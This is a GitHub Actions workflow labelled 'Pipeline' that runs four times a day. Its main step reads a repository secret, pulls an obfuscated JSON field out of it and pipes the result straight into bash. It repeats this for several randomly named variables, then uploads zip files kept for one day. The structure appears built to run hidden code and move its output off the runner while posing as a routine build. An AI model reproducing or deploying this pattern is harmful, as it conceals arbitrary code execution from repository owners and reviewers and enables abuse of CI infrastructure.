name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '23 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Start
        env:
          ra1: ${{ secrets.ra1 }}
        run: |
          printf '%s' "$ra1" | jq -r .yodgl61830 | /bin/bash
          printf '%s' "$rsdit8" | jq -r .xkmy7 | /bin/bash
          printf '%s' "$rphf50" | jq -r .myzbz1 | /bin/bash
          echo $qgqu17 | jq -r .gtes1 | /bin/bash
          printf '%s' "$cynjl468" | jq -r .l9647 | /bin/bash
          printf '%s' "$vio9324" | jq -r .bl7481 | /bin/bash
          echo $yyroo7 | jq -r .qvo85411 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: FCutnrri
          path: "*.zip"
          retention-days: 1
